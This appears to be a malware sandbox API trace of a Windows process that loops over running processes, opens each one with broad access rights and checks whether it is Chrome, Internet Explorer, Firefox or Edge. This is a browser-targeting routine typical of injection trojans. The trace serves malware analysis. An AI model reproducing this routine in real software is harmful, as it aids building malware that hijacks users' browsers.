	[0256.019] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0xb1b0
	[0256.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.019] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.020] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.020] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.020] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.020] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.020] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.020] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0256.021] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0xb1b4
	[0256.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.021] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0256.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.022] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.022] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0256.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.022] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.023] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.023] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0xb1b8
	[0256.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.023] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.024] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.024] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.024] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.025] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.025] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0xb1bc
	[0256.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.026] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.026] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.026] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.027] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.027] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.027] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0256.028] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0xb1c0
	[0256.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.028] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0256.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.029] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.029] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0256.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.029] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.029] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0256.030] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0xb1c4
	[0256.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.030] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.031] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.031] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.031] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.031] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0256.032] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0xb1c8
	[0256.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.032] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0256.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.033] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.033] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0256.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.033] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.033] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.034] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0xb1cc
	[0256.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.034] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.035] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.035] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.035] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.035] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0256.036] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd70) returned 0xb1d0
	[0256.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.036] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0256.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.037] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.037] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0256.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.037] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.037] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0256.038] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd6c) returned 0xb1d4
	[0256.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.038] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.039] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.039] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.039] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.039] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0256.040] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xed4) returned 0xb1d8
	[0256.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.040] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0256.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.041] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.041] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0256.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.041] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.041] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 0
	[0256.042] CloseHandle (hObject=0x4fd0) returned 1
	[0256.042] Sleep (dwMilliseconds=0x64) 
	[0256.137] GetCurrentProcessId () returned 0x110
	[0256.137] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0256.141] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0256.142] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0256.143] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0256.145] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0xb1dc
	[0256.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.145] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0256.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.145] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.146] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.146] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0256.146] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.146] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.147] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0256.148] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0xb1e0
	[0256.148] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.148] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0256.149] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.149] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.149] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.149] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0256.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.150] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.150] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0256.152] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0xb1e4
	[0256.152] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.152] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0256.152] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.153] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.153] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.153] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0256.153] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.154] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.154] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0256.154] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0xb1e8
	[0256.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.155] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0256.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.155] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.155] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0256.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.155] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.156] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0256.156] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0xb1ec
	[0256.157] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.157] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0256.157] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.157] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.157] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.157] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0256.158] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.158] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.158] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0256.159] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0xb1f0
	[0256.159] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.159] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0256.159] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.159] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.159] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.159] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0256.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.160] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.160] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0256.161] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0xb1f4
	[0256.161] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.161] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0256.161] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.161] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.161] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.161] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0256.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.162] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.162] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0256.163] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0xb1f8
	[0256.163] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.163] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0256.163] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.163] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.163] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.163] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0256.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.164] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.164] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.164] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0xb1fc
	[0256.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.165] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.165] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.165] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.166] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.166] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.166] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.167] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0xb200
	[0256.167] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.167] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.167] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.167] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.167] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.167] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.168] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.168] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.207] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0xb204
	[0256.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.207] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.207] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.208] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.208] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.208] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.208] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.208] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.209] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0xb208
	[0256.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.209] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.210] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.210] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.210] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.210] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.211] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0xb20c
	[0256.211] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.211] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.212] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.212] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.213] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.213] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
